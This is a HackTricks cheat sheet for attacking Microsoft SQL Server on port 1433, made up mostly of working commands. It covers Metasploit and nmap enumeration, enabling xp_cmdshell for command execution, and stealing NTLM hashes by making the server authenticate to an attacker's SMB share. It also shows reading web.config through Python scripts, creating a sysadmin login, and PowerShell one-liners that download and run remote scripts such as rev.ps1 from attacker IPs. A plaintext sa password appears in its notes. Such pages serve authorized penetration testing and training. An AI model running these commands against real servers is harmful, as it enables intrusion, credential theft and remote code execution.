1433 - Pentesting MSSQL - Microsoft SQL Server

Support HackTricks and get benefits!
Support HackTricks and get benefits!
Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
Discover The PEASS Family, our collection of exclusive NFTs
Get the official PEASS & HackTricks swag​
Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦​@carlospolopm.
Share your hacking tricks submitting PRs to the hacktricks github repo.
Basic Information
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).
From wikipedia.
Default port: 1433
1
1433/tcp open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
Copied!
Search for exploits/scripts/auxiliary modules that can be helpful to find vulnerabilities in this kind of service:
1
searchsploit "microsoft sql server"
2
nmap --script-help "*ms* and *sql*"
3
msf> search mssql
Copied!
Information
Default MS-SQL System Tables
master Database : Records all the system-level information for an instance of SQL Server.
msdb Database : Is used by SQL Server Agent for scheduling alerts and jobs.
model Database : Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards.
Resource Database : Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database.
tempdb Database : Is a work-space for holding temporary objects or intermediate result sets.
Info Gathering
If you don't know nothing about the service:
1
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
2
msf> use auxiliary/scanner/mssql/mssql_ping
Copied!
If you don't have credentials you can try to guess them. You can use nmap or metasploit. Be careful, you can block accounts if you fail login several times using an existing username.
Metasploit
1
#Set USERNAME, RHOSTS and PASSWORD
2
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used
3
​
4
#Steal NTLM
5
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder
6
​
7
#Info gathering
8
msf> use admin/mssql/mssql_enum #Security checks
9
msf> use admin/mssql/mssql_enum_domain_accounts
10
msf> use admin/mssql/mssql_enum_sql_logins
11
msf> use auxiliary/admin/mssql/mssql_findandsampledata
12
msf> use auxiliary/scanner/mssql/mssql_hashdump
13
msf> use auxiliary/scanner/mssql/mssql_schemadump
14
​
15
#Search for insteresting data
16
msf> use auxiliary/admin/mssql/mssql_findandsampledata
17
msf> use auxiliary/admin/mssql/mssql_idf
18
​
19
#Privesc
20
msf> use exploit/windows/mssql/mssql_linkcrawler
21
msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate
22
msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin
23
​
24
#Code execution
25
msf> use admin/mssql/mssql_exec #Execute commands
26
msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload
27
​
28
#Add new admin user from meterpreter session
29
msf> use windows/manage/mssql_local_auth_bypass
Copied!
​Brute force​
Tricks
Execute commands
1
#Username + Password + CMD command
2
crackmapexec mssql -d <Domain name> -u <username> -p <password> -x "whoami"
3
#Username + Hash + PS command
4
crackmapexec mssql -d <Domain name> -u <username> -H <HASH> -X '$PSVersionTable'
5
​
6
#this turns on advanced options and is needed to configure xp_cmdshell
7
sp_configure 'show advanced options', '1'
8
RECONFIGURE
9
#this enables xp_cmdshell
10
sp_configure 'xp_cmdshell', '1'
11
RECONFIGURE
12
# Quickly check what the service account is via xp_cmdshell
13
EXEC master..xp_cmdshell 'whoami'
14
​
15
# Bypass blackisted "EXEC xp_cmdshell"
16
‘; DECLARE @x AS VARCHAR(100)=’xp_cmdshell’; EXEC @x ‘ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net’ —
Copied!
NTLM Service Hash gathering
​You can extract the NTLM hash of the user making the service authenticate against you.
You should start a SMB server to capture the hash used in the authentication (impacket-smbserver or responder for example).
1
xp_dirtree '\\<attacker_IP>\any\thing'
2
exec master.dbo.xp_dirtree '\\<attacker_IP>\any\thing'
3
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
Copied!
Abusing MSSQL trusted Links
​Read this post to find more information about how to abuse this feature
Read files executing scripts (Python and R)
MSSQL could allow you to execute scripts in Python and/or R. These code will be executed by a different user than the one using xp_cmdshell to execute commands.
Example trying to execute a 'R' "Hellow World!" not working:
Example using configured python to perform several actions:
1
#Print the user being used (and execute commands)
2
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())'
3
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))'
4
#Open and read a file
5
EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())'
6
#Multiline
7
EXECUTE sp_execute_external_script @language = N'Python', @script = N'
8
import sys
9
print(sys.version)
10
'
11
GO
Copied!
From db_owner to sysadmin
​If you have the credentials of a db_owner user​, you can become sysadmin and execute commands​
1
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
Copied!
Impersonation of other users
​IMPERSONATE privilege can lead to privilege escalation in SQL Server.​
1
msf> auxiliary/admin/mssql/mssql_escalate_execute_as
Copied!
Using MSSQL for Persistence
​https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/​
Having credentials
Mssqlclient.py
You can login into the service using impacket mssqlclient.py
1
mssqlclient.py  -db volume -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP> #Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine
2
​
3
#Once logged in you can run queries:
4
SQL> select @@version;
5
​
6
#Steal NTLM hash
7
sudo responder -I <interface> #Run that in other console
8
SQL> exec master..xp_dirtree '\\<YOUR_RESPONDER_IP>\test' #Steal the NTLM hash, crack it with john or hashcat
9
​
10
#Try to enable code execution
11
SQL> enable_xp_cmdshell
12
​
13
#Execute code, 2 sintax, for complex and non complex cmds
14
SQL> xp_cmdshell whoami /all
15
SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile'
Copied!
sqsh
1
sqsh -S <IP> -U <Username> -P <Password> -D <Database>
Copied!
Manual
1
SELECT name FROM master.dbo.sysdatabases #Get databases
2
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES; #Get table names
3
#List Linked Servers
4
EXEC sp_linkedservers
5
SELECT * FROM sys.servers;
6
#List users
7
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
8
#Create user with sysadmin privs
9
CREATE LOGIN hacker WITH PASSWORD = '[email protected]!'
10
sp_addsrvrolemember 'hacker', 'sysadmin'
Copied!
Post Explotation
The user running MSSQL server will have enabled the privilege token SeImpersonatePrivilege.
You probably will be able to escalate to Administrator using this token: Juicy-potato​
Shodan
port:1433 !HTTP
HackTricks Automatic Commands
1
Protocol_Name: MSSQL    #Protocol Abbreviation if there is one.
2
Port_Number:  1433     #Comma separated if there is more than one.
3
Protocol_Description: Microsoft SQL Server         #Protocol Abbreviation Spelled out
4
​
5
Entry_1:
6
  Name: Notes
7
  Description: Notes for MSSQL
8
  Note: |
9
    Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).
10
​
11
    #sqsh -S 10.10.10.59 -U sa -P GWE3V65#[email protected]
12
​
13
    ###the goal is to get xp_cmdshell working###
14
    1. try and see if it works
15
        xp_cmdshell `whoami`
16
        go
17
​
18
    2. try to turn component back on
19
        EXEC SP_CONFIGURE 'xp_cmdshell' , 1
20
        reconfigure
21
        go
22
        xp_cmdshell `whoami`
23
        go
24
​
25
    3. 'advanced' turn it back on
26
        EXEC SP_CONFIGURE 'show advanced options', 1
27
        reconfigure
28
        go
29
        EXEC SP_CONFIGURE 'xp_cmdshell' , 1
30
        reconfigure
31
        go
32
        xp_cmdshell 'whoami'
33
        go
34
​
35
​
36
​
37
​
38
    xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')"
39
​
40
​
41
    https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
42
​
43
Entry_2:
44
  Name: Nmap for SQL
45
  Description: Nmap with SQL Scripts
46
  Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP}
47
  
48
Entry_3:
49
  	Name: MSSQL consolesless mfs enumeration
50
  	Description: MSSQL enumeration without the need to run msfconsole
51
  	Note: sourced from https://github.com/carlospolop/legion
52
  	Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT <PORT>; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT <PORT>; run; exit' 
53
    
Copied!
Support HackTricks and get benefits!